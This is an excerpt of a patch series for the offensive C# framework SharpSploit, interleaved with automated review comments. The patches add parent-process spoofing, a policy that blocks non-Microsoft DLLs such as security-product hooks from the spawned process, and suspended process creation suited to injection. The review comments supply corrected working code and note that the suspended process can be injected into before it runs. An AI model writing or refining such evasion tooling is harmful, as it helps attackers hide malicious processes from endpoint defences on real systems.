@@ -350,20 +359,17 @@ out ProcInfo /// /// Code has been kindly stolen and adapted from TikiTorch (https://github.com/rasta-mouse/TikiTorch/blob/064c60c5e23188867a0f9c5a0626dd39718750d4/TikiLoader/Generic.cs). /// - public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokePPID(string targetProcess, int parentProcessId) + public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokePPID(string targetProcess, int parentProcessId, bool blockDLL) { - const int ProcThreadAttributeParentProcess = 0x00020000; - Win32.ProcessThreadsAPI._STARTUPINFOEX StartupInfoEx = new Win32.ProcessThreadsAPI._STARTUPINFOEX(); - Win32.ProcessThreadsAPI._PROCESS_INFORMATION ProcInfo; + Win32.ProcessThreadsAPI._PROCESS_INFORMATION ProcInfo = new Win32.ProcessThreadsAPI._PROCESS_INFORMATION(); StartupInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(StartupInfoEx); - IntPtr lpValue = IntPtr.Zero; + IntPtr lpValue = Marshal.AllocHGlobal(IntPtr.Size); try { - Win32.WinBase._SECURITY_ATTRIBUTES pSec = new Win32.WinBase._SECURITY_ATTRIBUTES(); Win32.WinBase._SECURITY_ATTRIBUTES tSec = new Win32.WinBase._SECURITY_ATTRIBUTES(); pSec.nLength = (uint)Marshal.SizeOf(pSec); 
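Review bot: `CreateProcessPInvokePPID` gains a `blockDLL` parameter but the XML doc immediately above (visible as context in this hunk) still documents only `targetProcess` and `parentProcessId`; add `/// <param name="blockDLL">When true, applies PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON to the child.</param>`. A default of `bool blockDLL = false` would keep the previous two-argument call working for existing users of this public method. The `lpValue` buffer allocated here before the `try` is `IntPtr.Size` bytes, which is too small to hold the 64-bit policy value in a 32-bit process; the method body continues in the next hunk.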
@@ -374,15 +380,21 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT; IntPtr lpSize = IntPtr.Zero; - PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize); + PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize); StartupInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize); - PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 1, 0, ref lpSize); + PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 2, 0, ref lpSize); + + if (blockDLL) + { + Marshal.WriteIntPtr(lpValue, new IntPtr((long)Win32.Advapi32.BINARY_SIGNATURE_POLICY.BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE)); + PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)Win32.Advapi32.PROCESS_THREAD_ATTRIBUTE.MITIGATION_POLICY, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); + } IntPtr parentHandle = Process.GetProcessById(parentProcessId).Handle; lpValue = Marshal.AllocHGlobal(IntPtr.Size); Marshal.WriteIntPtr(lpValue, parentHandle); - PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)ProcThreadAttributeParentProcess, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); + PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)Win32.Advapi32.PROCESS_THREAD_ATTRIBUTE.PARENT_PROCESS, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); PInvoke.Win32.Kernel32.CreateProcess(targetProcess, null, ref pSec, ref tSec, false, flags, IntPtr.Zero, null, ref StartupInfoEx, out ProcInfo); return ProcInfo; diff --git a/SharpSploit/Execution/Win32.cs b/SharpSploit/Execution/Win32.cs index 69f61c2..7d80b44 100644 --- a/SharpSploit/Execution/Win32.cs +++ b/SharpSploit/Execution/Win32.cs 
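Review bot: `lpValue = Marshal.AllocHGlobal(IntPtr.Size);` in the middle of this hunk overwrites the buffer allocated at the top of the method — the one that, when `blockDLL` is true, already holds the mitigation policy and was handed to `UpdateProcThreadAttribute` — so the `finally` only frees the second buffer and the first leaks on every call. It cannot simply be freed before the reassignment either: `UpdateProcThreadAttribute` stores a pointer to `lpValue`, and the documented rule is that the value buffer must stay valid until `DeleteProcThreadAttributeList`. Use two named buffers and free both in `finally`, and give the policy an 8-byte buffer, since `new IntPtr((long)0x300000000000)` throws OverflowException in a 32-bit process and `IntPtr.Size` is then the wrong `cbSize`. The return values of `InitializeProcThreadAttributeList`, `UpdateProcThreadAttribute` and `CreateProcess` are still unchecked (`Win32Exception` needs `System.ComponentModel` in scope). The `finally` that frees `lpValue` is outside this hunk and would need to free `lpPolicy` and `lpParent` instead.
```csharp
IntPtr lpPolicy = IntPtr.Zero;   // replaces the single lpValue allocated at the top of the method
IntPtr lpParent = IntPtr.Zero;
// … unchanged: security attributes, STARTUPINFO flags, attribute-list allocation …
if (blockDLL)
{
    lpPolicy = Marshal.AllocHGlobal(sizeof(long));
    Marshal.WriteInt64(lpPolicy, (long)Win32.Advapi32.BINARY_SIGNATURE_POLICY.BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON);
    if (!PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)Win32.Advapi32.PROCESS_THREAD_ATTRIBUTE.MITIGATION_POLICY, lpPolicy, (IntPtr)sizeof(long), IntPtr.Zero, IntPtr.Zero))
        throw new Win32Exception(Marshal.GetLastWin32Error());
}
IntPtr parentHandle = Process.GetProcessById(parentProcessId).Handle;
lpParent = Marshal.AllocHGlobal(IntPtr.Size);
Marshal.WriteIntPtr(lpParent, parentHandle);
if (!PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)Win32.Advapi32.PROCESS_THREAD_ATTRIBUTE.PARENT_PROCESS, lpParent, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero))
    throw new Win32Exception(Marshal.GetLastWin32Error());
if (!PInvoke.Win32.Kernel32.CreateProcess(targetProcess, null, ref pSec, ref tSec, false, flags, IntPtr.Zero, null, ref StartupInfoEx, out ProcInfo))
    throw new Win32Exception(Marshal.GetLastWin32Error());
// … unchanged: return ProcInfo; the finally block frees lpPolicy (if non-zero) and lpParent …
```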
@@ -489,6 +489,21 @@ public enum SERVICE_ERROR SERVICE_ERROR_SEVERE = 0x00000002, SERVICE_ERROR_CRITICAL = 0x00000003, } + + [Flags] + public enum BINARY_SIGNATURE_POLICY : ulong + { + BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000, + BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE = 0x300000000000 + } + + [Flags] + public enum PROCESS_THREAD_ATTRIBUTE : int + { + MITIGATION_POLICY = 0x20007, + PARENT_PROCESS = 0x00020000 + } + } public static class Dbghelp From 4d891a01775f20cf6889aafd27dd7674a21316d8 Mon Sep 17 00:00:00 2001 From: salu90 Date: Wed, 30 Sep 2020 16:22:15 +0200 Subject: [PATCH 5/7] Update Shell.cs --- SharpSploit/Execution/Shell.cs | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/SharpSploit/Execution/Shell.cs b/SharpSploit/Execution/Shell.cs index b58f182..b6fd22f 100644 --- a/SharpSploit/Execution/Shell.cs +++ b/SharpSploit/Execution/Shell.cs @@ -386,7 +386,7 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP if (blockDLL) { - Marshal.WriteIntPtr(lpValue, new IntPtr((long)Win32.Advapi32.BINARY_SIGNATURE_POLICY.BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE)); + Marshal.WriteIntPtr(lpValue, new IntPtr((long)Win32.Advapi32.BINARY_SIGNATURE_POLICY.BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON)); PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)Win32.Advapi32.PROCESS_THREAD_ATTRIBUTE.MITIGATION_POLICY, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); } @@ -408,4 +408,4 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP } } -} \ No newline at end of file +} From 58ab77a7b3bf03009b59a4cb4d547ebcd5dd19a9 Mon Sep 17 00:00:00 2001 From: salu90 Date: Wed, 30 Sep 2020 22:40:07 +0200 Subject: [PATCH 6/7] Modify CreateProcessPInvokePPID and CreateProcessPInvoke --- SharpSploit/Execution/Shell.cs | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) 
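Review bot: `[Flags]` on `PROCESS_THREAD_ATTRIBUTE` is misleading: `MITIGATION_POLICY` (0x20007) and `PARENT_PROCESS` (0x00020000) are attribute identifiers that are never OR-ed together and whose bits overlap, so the attribute should be dropped; `BINARY_SIGNATURE_POLICY` is legitimately a bit set. Both `BINARY_SIGNATURE_POLICY` members live in bit 44 of the 64-bit PROCESS_CREATION_MITIGATION_POLICY value and therefore only fit an 8-byte attribute buffer, which the Shell.cs hunks in this same patch do not provide (they write `IntPtr.Size` bytes); a comment such as `// DWORD64 mitigation policy (bit 44): pass an 8-byte buffer with cbSize 8 to UpdateProcThreadAttribute, not IntPtr.Size` on the enum would steer callers right. The numeric values themselves match the SDK's `..._BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON` (0x1ui64 << 44), `..._ALLOW_STORE` (0x3ui64 << 44), `PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY` and `PROC_THREAD_ATTRIBUTE_PARENT_PROCESS`.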
diff --git a/SharpSploit/Execution/Shell.cs b/SharpSploit/Execution/Shell.cs index b58f182..08d6136 100644 --- a/SharpSploit/Execution/Shell.cs +++ b/SharpSploit/Execution/Shell.cs @@ -321,7 +321,7 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvoke( StartupInfoEx.StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE - Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT; + Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT | Win32.Advapi32.CREATION_FLAGS.CREATE_SUSPENDED; if (blockDLL) { @@ -375,9 +375,9 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP pSec.nLength = (uint)Marshal.SizeOf(pSec); tSec.nLength = (uint)Marshal.SizeOf(tSec); - StartupInfoEx.StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; - StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE - Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT; + //StartupInfoEx.StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; + //StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE + Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT | Win32.Advapi32.CREATION_FLAGS.CREATE_SUSPENDED; IntPtr lpSize = IntPtr.Zero; PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize); 
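Review bot: Adding `CREATE_SUSPENDED` to both methods changes their contract — the child does not run until something calls `ResumeThread` on `ProcInfo.hThread` — yet the XML summaries above them still read "Creates a process ..." and nothing visible in this series resumes the thread. Document it next to each summary, e.g. `/// <remarks>The process is created suspended; the caller must ResumeThread(ProcInfo.hThread) (or inject into it first) and close hProcess/hThread when done.</remarks>`. Since the `EXTENDED_STARTUPINFO_PRESENT` flag now applies to `CreateProcessPInvoke` even when `blockDLL` is false and `lpAttributeList` is still null, it would be worth confirming on a test host that `CreateProcess` accepts that combination. The `dwFlags`/`wShowWindow` lines commented out in the second hunk are restored by patch 7, so that part needs no action.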
@@ -386,7 +386,7 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP if (blockDLL) { - Marshal.WriteIntPtr(lpValue, new IntPtr((long)Win32.Advapi32.BINARY_SIGNATURE_POLICY.BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE)); + Marshal.WriteIntPtr(lpValue, new IntPtr((long)Win32.Advapi32.BINARY_SIGNATURE_POLICY.BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON)); PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)Win32.Advapi32.PROCESS_THREAD_ATTRIBUTE.MITIGATION_POLICY, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); } From e2c5288114bdd565cc7c71b95b2045f109405afe Mon Sep 17 00:00:00 2001 From: salu90 Date: Wed, 30 Sep 2020 22:45:22 +0200 Subject: [PATCH 7/7] Update Shell.cs --- SharpSploit/Execution/Shell.cs | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/SharpSploit/Execution/Shell.cs b/SharpSploit/Execution/Shell.cs index 520fe64..e964478 100644 --- a/SharpSploit/Execution/Shell.cs +++ b/SharpSploit/Execution/Shell.cs @@ -375,8 +375,8 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP pSec.nLength = (uint)Marshal.SizeOf(pSec); tSec.nLength = (uint)Marshal.SizeOf(tSec); - //StartupInfoEx.StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; - //StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE + StartupInfoEx.StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; + StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT | Win32.Advapi32.CREATION_FLAGS.CREATE_SUSPENDED; IntPtr lpSize = IntPtr.Zero;
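Review bot: This hunk is the same one-line change (ALLOW_STORE to ALWAYS_ON at Shell.cs line 389) that patch 5 already makes, and both patch 5 (`index b58f182..b6fd22f`) and patch 6 (`index b58f182..08d6136`) are diffed against the same base blob b58f182, so applying the series in order will fail or conflict at patch 6. Rebase patch 6 onto patch 5's result or drop this duplicate hunk from it. Patch 7 then starts from blob 520fe64, which no earlier patch in the series produces — presumably a merge commit that is not included — so the series as posted cannot be applied cleanly with `git am`; the patch 7 hunk itself is cut off at the end of this excerpt.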